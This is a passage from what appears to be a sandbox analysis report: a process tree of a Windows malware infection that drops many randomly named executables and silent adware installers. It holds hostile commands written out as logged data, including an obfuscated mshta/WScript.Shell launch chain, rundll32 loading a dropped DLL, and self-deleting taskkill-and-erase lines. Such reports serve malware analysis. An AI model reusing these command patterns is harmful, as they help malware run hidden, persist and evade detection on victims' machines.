                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4424
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\PCnJkIx_dlldorwyzw16N2MH.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\PCnJkIx_dlldorwyzw16N2MH.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:8296
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                              WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:8676
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:8984
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:9364
                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:6048
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill -IM "PCnJkIx_dlldorwyzw16N2MH.exe" -f
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:8784
                                                                                                                                                                              • C:\Users\Admin\Documents\0UNUu_U2K68m1R1AjIJdFpi1.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\0UNUu_U2K68m1R1AjIJdFpi1.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3184
                                                                                                                                                                                • C:\Users\Admin\Documents\kO3ggOQxRNJvkPsoJf_jpjiG.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\kO3ggOQxRNJvkPsoJf_jpjiG.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:5688
                                                                                                                                                                                    • C:\Users\Admin\Documents\kO3ggOQxRNJvkPsoJf_jpjiG.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\kO3ggOQxRNJvkPsoJf_jpjiG.exe" -q
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6004
                                                                                                                                                                                    • C:\Users\Admin\Documents\QIllcycAMHKbkU6NGRBlBoRC.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\QIllcycAMHKbkU6NGRBlBoRC.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:6516
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 660
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:6900
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 664
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:7872
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 644
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:8056
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 680
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          PID:5976
                                                                                                                                                                                      • C:\Users\Admin\Documents\DIUfgWSdMPVKGTgc8M98df1k.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\DIUfgWSdMPVKGTgc8M98df1k.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        PID:4168
                                                                                                                                                                                      • C:\Users\Admin\Documents\5xmtyQsuVz5pXqkzdpuzOIhl.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\5xmtyQsuVz5pXqkzdpuzOIhl.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5852
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 388
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:6860
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 376
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:6024
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 404
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Program crash
                                                                                                                                                                                            PID:5304
                                                                                                                                                                                          • C:\Users\Admin\Documents\5xmtyQsuVz5pXqkzdpuzOIhl.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\5xmtyQsuVz5pXqkzdpuzOIhl.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1928
                                                                                                                                                                                          • C:\Users\Admin\Documents\Djb4J9rn1NO8caGREiNGAzXn.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\Djb4J9rn1NO8caGREiNGAzXn.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                            PID:4136
                                                                                                                                                                                          • C:\Users\Admin\Documents\lI3aIMg73kxBFW01QdFQzomx.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\lI3aIMg73kxBFW01QdFQzomx.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                            PID:6292
                                                                                                                                                                                          • C:\Users\Admin\Documents\rrrujcVqTDK2ijyG1J9SUYVe.exe
                                                                                                                                                                                            "C:\Users\Admin\Documents\rrrujcVqTDK2ijyG1J9SUYVe.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5548
                                                                                                                                                                                            • C:\Users\Admin\Documents\SVDarwJfEEaRC_6NMkorQjxR.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\SVDarwJfEEaRC_6NMkorQjxR.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:4456
                                                                                                                                                                                            • C:\Users\Admin\Documents\ZI07O2m0Q4oMwCOn843Q8mbt.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\ZI07O2m0Q4oMwCOn843Q8mbt.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:5328
                                                                                                                                                                                            • C:\Users\Admin\Documents\ZrbnM5ZQEaw7SwHqUIu0Go01.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\ZrbnM5ZQEaw7SwHqUIu0Go01.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:7104
                                                                                                                                                                                            • C:\Users\Admin\Documents\b0TrsUdYuzbbLhc88tBI6iHu.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\b0TrsUdYuzbbLhc88tBI6iHu.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                              PID:7008
                                                                                                                                                                                            • C:\Users\Admin\Documents\bILs3Ne6zjILXR8760GigmS7.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\bILs3Ne6zjILXR8760GigmS7.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:7920
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "bILs3Ne6zjILXR8760GigmS7.exe" /f & erase "C:\Users\Admin\Documents\bILs3Ne6zjILXR8760GigmS7.exe" & exit
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:7268
                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                      taskkill /im "bILs3Ne6zjILXR8760GigmS7.exe" /f
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      PID:7176
                                                                                                                                                                                                • C:\Users\Admin\Documents\_BgaylvicPAAl6YrvHehZi1y.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\_BgaylvicPAAl6YrvHehZi1y.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:7912
                                                                                                                                                                                                  • C:\Users\Admin\Documents\_BgaylvicPAAl6YrvHehZi1y.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\_BgaylvicPAAl6YrvHehZi1y.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:6636
                                                                                                                                                                                                  • C:\Users\Admin\Documents\N9Spj8A8naJbhxUsRvODojJI.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\N9Spj8A8naJbhxUsRvODojJI.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:7896
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-DHPRD.tmp\N9Spj8A8naJbhxUsRvODojJI.tmp
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-DHPRD.tmp\N9Spj8A8naJbhxUsRvODojJI.tmp" /SL5="$30292,138429,56832,C:\Users\Admin\Documents\N9Spj8A8naJbhxUsRvODojJI.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                        PID:6040
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MR1UA.tmp\Setup.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MR1UA.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:8828
                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:8840
                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586629 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:7176
                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:5196
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-O7SO8.tmp\MediaBurner2.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-O7SO8.tmp\MediaBurner2.tmp" /SL5="$10408,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:2360
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-MQ682.tmp\ultradumnibour.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-MQ682.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                              PID:6180
                                                                                                                                                                                                              • C:\Program Files\Windows Mail\BJHEOQQCFF\ultramediaburner.exe
                                                                                                                                                                                                                "C:\Program Files\Windows Mail\BJHEOQQCFF\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:7148
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-H4GCE.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-H4GCE.tmp\ultramediaburner.tmp" /SL5="$5021E,281924,62464,C:\Program Files\Windows Mail\BJHEOQQCFF\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                    PID:4592
                                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:7244
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\08-097a3-0fd-3288b-0fd72ddf34bfc\Guriqeqiga.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\08-097a3-0fd-3288b-0fd72ddf34bfc\Guriqeqiga.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:1216
                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                        dw20.exe -x -s 2444
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:10000
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\98-85514-ee1-76a81-60f6852b8ce4e\Laeshalivushi.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\98-85514-ee1-76a81-60f6852b8ce4e\Laeshalivushi.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:7200
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pe04rxni.bri\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:8216
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\pe04rxni.bri\GcleanerEU.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\pe04rxni.bri\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:6128
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pe04rxni.bri\GcleanerEU.exe" & exit
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:8876
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:8848
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wgjxdc0t.d2b\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:6744
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wgjxdc0t.d2b\installer.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wgjxdc0t.d2b\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:7292
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tulg1wbx.md2\anyname.exe & exit
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:8580
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tulg1wbx.md2\anyname.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\tulg1wbx.md2\anyname.exe
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:1488
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tulg1wbx.md2\anyname.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\tulg1wbx.md2\anyname.exe" -q
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:9988
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w4u24gmn.fb5\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:8052
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\w4u24gmn.fb5\gcleaner.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\w4u24gmn.fb5\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:7372
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w4u24gmn.fb5\gcleaner.exe" & exit
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                      PID:8216
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                        taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                        PID:6104
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\flqd1aom.vz3\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:4700
                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                        PID:1404
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:5708
                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                        PID:5480
                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding FD1C96174152CE4A967E8F23D2A5F573 C
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:9060
                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 6390A762716920C1C9E16B5DA33A6B27 C
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:6176
                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding CD143D0CDC2170C6BFB483649ED5C335 C
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:9420
                                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 4424E5E29A89829247D2226801100699
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:8436
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:616
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6028
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--M3yPGhgtKO"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:5304
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffd0d6c9ec0,0x7ffd0d6c9ed0,0x7ffd0d6c9ee0
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:7388
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=1924 /prefetch:8
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:8644
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2384 /prefetch:1
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:7328
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=1908 /prefetch:8
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:8212
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1864 /prefetch:2
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                    PID:8840
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=3084 /prefetch:8
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:6988
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
